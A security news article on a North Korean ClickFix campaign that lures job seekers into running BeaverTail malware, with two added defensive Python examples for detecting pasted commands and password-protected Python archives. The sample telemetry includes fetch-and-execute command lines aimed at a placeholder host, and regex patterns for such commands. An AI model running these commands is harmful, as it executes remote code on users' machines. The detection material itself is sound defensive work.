North Korean Hackers Target Job Seekers with Sophisticated “ClickFix” Scams
GitLab published a report by researcher Oliver Smith detailing a fresh wave of attacks and analyzing a shift in tactics by a North Korean cyber group that employs the BeaverTail and InvisibleFerret malware families. The report describes a campaign in which the adversaries abandoned their prior developer-centric targeting and instead adopted ClickFix techniques to prey on job applicants in marketing, sales and retail — including roles advertised by Web3 companies.
BeaverTail, a JavaScript stealer known to act as a dropper for the Python backdoor InvisibleFerret, was first profiled in depth by Palo Alto Networks in late 2023. Since then, attackers have distributed it via fake npm packages and counterfeit video-conference applications such as FCCCall and FreeConference.
Operating under labels like Contagious Interview or Gwisin Gang and associated with the broader Lazarus umbrella, the group has been active since December 2022 and previously tended to cloak malicious tools with developer-focused lures.
The new surge observed in late May 2025 is notable because the threat actors used ClickFix-style traps to deliver compiled BeaverTail binaries, produced with packagers such as pkg and PyInstaller for Windows, macOS and Linux. Their vector was a bogus recruitment portal hosted on Vercel, where they posted vacancies for trader, sales and marketing roles and even solicited investments in a purported Web3 project.
Visitors were fingerprinted by public IP, then invited to undergo a video assessment; when a supposed “microphone error” occurred, victims were prompted to run an OS-specific command — a step that executed shell scripts or Visual Basic scripts and installed a lightweight BeaverTail build.
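The delivery chain above ends with the victim pasting an OS-specific command into a Run box or terminal, which leaves a recognizable trace in endpoint telemetry: a shell interpreter spawned from a user-facing parent (browser, Explorer, Terminal) whose command line fetches and runs remote content. The following Python is an added example of a triage heuristic over such process-creation events; it is not code from the GitLab report. The event records are constructed, and the parent list, shell list and indicator patterns are this example's own assumptions.

```python
"""Heuristic triage of process-creation events for ClickFix-style execution.

Added example, not code from the GitLab report. A ClickFix lure ends with the
victim running a pasted command, so telemetry shows a shell launched from a
user-facing parent with a download-and-execute command line. Sample events are
constructed; parent/shell lists and indicator patterns are assumptions.
"""
import re
from dataclasses import dataclass

# Parents a pasted "fix" is typically launched from (assumed list).
USER_FACING_PARENTS = {
    "explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
    "terminal", "finder", "gnome-terminal", "konsole",
}
# Interpreters that execute the pasted command (assumed list).
SHELLS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "bash", "sh", "zsh", "osascript",
}
# Download-and-execute indicators, each with a label for the analyst.
INDICATORS = [
    ("curl/wget piped to a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.I)),
    ("PowerShell web fetch or IEX",
     re.compile(r"invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b", re.I)),
    ("encoded PowerShell command",
     re.compile(r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta loading a URL", re.compile(r"\bmshta\b.*https?://", re.I)),
    ("Visual Basic script launched", re.compile(r"\.vbs\b", re.I)),
]


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    """Last path component, lower-cased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect(event: ProcessEvent) -> list:
    """Return the reasons an event is suspicious; an empty list means not flagged."""
    image = _basename(event.image)
    hits = [label for label, rx in INDICATORS if rx.search(event.cmdline)]
    # Require both a shell interpreter and a download/execute indicator.
    if image not in SHELLS or not hits:
        return []
    reasons = [f"shell interpreter: {image}"] + [f"indicator: {h}" for h in hits]
    parent = _basename(event.parent_image)
    if parent in USER_FACING_PARENTS:
        reasons.append(f"launched from user-facing parent: {parent}")
    return reasons


def flag_events(events):
    """Return (event, reasons) pairs for every event detect() flags."""
    flagged = []
    for ev in events:
        reasons = detect(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample telemetry (hostnames and URLs are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent("ws-01", r"C:\Program Files\Google\Chrome\chrome.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell -w hidden -c "iwr http://lure.invalid/fix.ps1 | iex"'),
    ProcessEvent("mac-02", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
                 "/bin/bash",
                 'bash -c "curl -fsSL http://lure.invalid/mic.sh | sh"'),
    ProcessEvent("srv-03", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\patch.ps1"),
    ProcessEvent("ws-04", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c dir"),
]

if __name__ == "__main__":
    for ev, why in flag_events(SAMPLE_EVENTS):
        print(ev.host, _basename(ev.image), "->", "; ".join(why))
```

The parent check deliberately raises confidence rather than gating the rule: a pasted command may also be launched through an intermediate process, so the shell-plus-indicator pair is the minimum condition and the parent only adds context for the analyst.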
Observed modifications indicate rapid operational adaptation: the new build contains a simplified data-stealing module and targets only eight browser extensions instead of the prior twenty-two, with support for non-Chrome browsers removed. For the first time, attackers packaged Python dependencies for InvisibleFerret inside password-protected archives, a tactic that complicates analysis and evades rudimentary detection. The scant ancillary artifacts and the absence of elaborate social-engineering polishing suggest this may have been a probing operation rather than a fully scaled campaign.
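Password-protected archives defeat scanners that try to inflate the payload, but they cannot hide the fact that their members are encrypted: the ZIP general-purpose flag bit 0 is set in each header and is readable without the password. The following Python is an added example of a header-only triage step that flags archives whose encrypted members look like Python code, as the report describes for InvisibleFerret's dependencies; it is not code from GitLab or from the malware analysis. The sample archive is constructed in memory (a plain ZIP written with the standard library, then its encryption flag bits set by hand, which is enough for header inspection), and the list of Python-like extensions is an assumption.

```python
"""Header-only triage of a ZIP archive for password-protected Python members.

Added example, not code from the GitLab report. The fixture is constructed:
a plain archive is written with zipfile, then flag bit 0 ("encrypted") is set
in every local and central-directory header so the reader sees an encrypted
archive without any real cipher being applied.
"""
import io
import struct
import zipfile

# Extensions treated as Python code or native extensions (assumed list).
PYTHON_LIKE = (".py", ".pyc", ".pyd", ".whl", ".egg")


def mark_encrypted(data: bytes) -> bytes:
    """Constructed fixture helper: set flag bit 0 in local and central headers."""
    buf = bytearray(data)
    # Local header flags sit at offset 6; central-directory flags at offset 8.
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(sig)
        while pos != -1:
            (flags,) = struct.unpack_from("<H", buf, pos + off)
            struct.pack_into("<H", buf, pos + off, flags | 0x1)
            pos = buf.find(sig, pos + 1)
    return bytes(buf)


def build_sample_archive(encrypted: bool) -> bytes:
    """Constructed fixture: a small archive holding Python deps and a README."""
    out = io.BytesIO()
    # ZIP_STORED keeps member bytes literal, so no "PK" signature appears in data.
    with zipfile.ZipFile(out, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("deps/requests/__init__.py", "# placeholder module\n")
        zf.writestr("deps/socket_helper.pyd", b"\x00" * 16)
        zf.writestr("README.txt", "nothing to see\n")
    data = out.getvalue()
    return mark_encrypted(data) if encrypted else data


def triage_archive(data: bytes) -> dict:
    """Inspect headers only: encrypted members, Python-like members, password need."""
    encrypted, python_like = [], []
    needs_password = False
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = zf.infolist()
        for info in members:
            if info.flag_bits & 0x1:
                encrypted.append(info.filename)
            if info.filename.lower().endswith(PYTHON_LIKE):
                python_like.append(info.filename)
        # Confirm extraction is blocked: zipfile refuses encrypted members
        # unless a password is supplied.
        for name in encrypted:
            try:
                with zf.open(name) as fh:
                    fh.read(1)
            except RuntimeError:
                needs_password = True
                break
    return {
        "members": len(members),
        "encrypted": encrypted,
        "python_like": python_like,
        "needs_password": needs_password,
    }


def is_suspicious(report: dict) -> bool:
    """Flag archives whose encrypted members include Python code or extensions."""
    hidden_python = set(report["encrypted"]) & set(report["python_like"])
    return report["needs_password"] and bool(hidden_python)


if __name__ == "__main__":
    for label, flag in (("clean", False), ("password-protected", True)):
        rep = triage_archive(build_sample_archive(flag))
        print(label, rep, "suspicious:", is_suspicious(rep))
```

The check deliberately stops at the headers: the point is to route such archives to deeper analysis (or block them at the gateway) without depending on brute-forcing the password, which is exactly the step rudimentary scanners skip.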
This shift toward less technical candidates and compiled payloads reflects an intent to bypass environments lacking development tooling — operators continue to experiment with delivery chains to widen their reach and lower the barrier to compromise. Monitoring these vectors and vetting suspicious job postings on application-hosting platforms remain critical defenses against such schemes.